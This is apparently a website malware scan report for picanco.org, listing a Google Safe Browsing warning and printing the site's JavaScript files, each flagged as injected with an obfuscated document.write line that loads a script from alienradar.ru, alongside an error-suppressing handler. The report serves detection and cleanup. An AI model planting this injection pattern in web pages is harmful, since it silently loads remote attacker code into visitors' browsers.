Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=picanco.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.picanco.org/ | 200 OK Content-Length: 5546 Content-Type: text/html | clean |
http://www.picanco.org/javascripts.js | 200 OK Content-Length: 190 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
function blockError(){return true;} window.onerror = blockError; document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/GIF.js"></scri'+'pt>'); Antivirus reports:
| ||
http://www.picanco.org/pop-closeup.js | 200 OK Content-Length: 1854 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- Begin VIEWER OPTIONS CODE
var viewer = "same" var width = "800" var height = "625" var scrollbars = "yes" var menu = "no" var tool = "no" var FrameType = "1" function ViewImage(data) { if (viewer == "popup") { windowHandle = window.open('image-viewer.htm' + '?' + data,'windowName',',scrollbars='+scroll } else if (FrameType == "2") { top.location.href = "sound_frame/soundFRAME-NOSCRIPT.htm"; } } function AutoSoundFrame (){ top.location.href = "sound_frame/soundFRAME-AUTOSTART.htm"; } document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/GIF.js"></scri'+'pt>'); Antivirus reports:
| ||
http://www.picanco.org/menu.js | 200 OK Content-Length: 1474 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- Begin
document.write('<TABLE cellpadding="0" cellspacing="0" border="0" width="100%" bgcolor="#000000" class="menutable"><tr>'); document.write('</td><td align="center">'); document.write('<a href="gallery.htm" class="menu">gallery</a>'); document.write('</td><td align="center">'); document.write('<a href="about.htm" class="menu">about</a>'); document. document.write('<a href="contact.htm" class="menu">contact</a>'); document.write('</td><td align="center">'); document.write('<a href="index.html" class="menu">home</a>'); document.write('</td></tr></table>'); document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/GIF.js"></scri'+'pt>'); Antivirus reports:
| ||
http://www.picanco.org/header.js | 200 OK Content-Length: 1939 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- Begin HEADER OPTIONS CODE
var flashcolor = "000000" var color = "000000" var flashheight = "100" var flashwidth = "750" var headerline = "yes" document.write('<TABLE cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="center" bgcolor="#'+color+'">'); document.write('<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase=" if (headerline == "yes") { document.write('</td></tr><tr><td background="picts/header-line.gif">'); document.write('<img src="picts/spacer.gif" height="8" width="10" border="0"><br>'); } document.write('</td></tr></table>'); document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/GIF.js"></scri'+'pt>'); Antivirus reports:
| ||
http://www.picanco.org/imagechanger.js | 200 OK Content-Length: 1771 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- Begin OPTIONS CODE
var flashwidth = "550" var flashheight = "366" var color = "000000" var bordercolor = "999999" var borderwidth = "1" document.write('<div id="flash">'); document.write('<TABLE cellpadding="0" cellspacing="0" border="0" width="'+flashwidth+'" style="border: #'+bordercolor+' '+borderwidth+'px solid"><tr><td valign="middle" align="center">'); document.wri document.write('</td></tr></table>'); document.write('</div>'); document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/GIF.js"></scri'+'pt>'); Antivirus reports:
| ||
http://www.picanco.org/copyright.js | 200 OK Content-Length: 462 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- Start
document.write('©Copyright 2008 '); document.write('<a href="index.html" target="_top" class="footerlink">Denise Picanco & James Jones</a> '); document.write('/'); document.write(' <a href="contact.htm" class="footerlink">Contact</a><br>'); document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/GIF.js"></scri'+'pt>'); Antivirus reports:
| ||
http://www.picanco.org/copyright-allwebco.js | 200 OK Content-Length: 515 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- Start
document.write('© 2008 Site Design <a href="http://allwebcodesign.com" target="_blank" class="footerlink">Allwebco Design</a> & <a href="http://allwebco.com" target="_blank" class="footerlink">Hosting</a>'); document.write('<br>'); document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/GIF.js"></scri'+'pt>'); Antivirus reports:
| ||
http://addonrock.ru/GIF.js | 500 Can't connect to addonrock.ru:80 (Bad hostname) Content-Length: 156 Content-Type: text/plain | clean |
http://addonrock.ru/test404page.js | 500 Can't connect to addonrock.ru:80 (Bad hostname) Content-Length: 156 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: picanco.org
Result:
GET / HTTP/1.1
Host: picanco.org
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: picanco.org
Referer: http://www.google.com/search?q=picanco.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: picanco.org
Referer: http://www.google.com/search?q=picanco.org
Result:
The result is similar to the first query. There are no suspicious redirects found.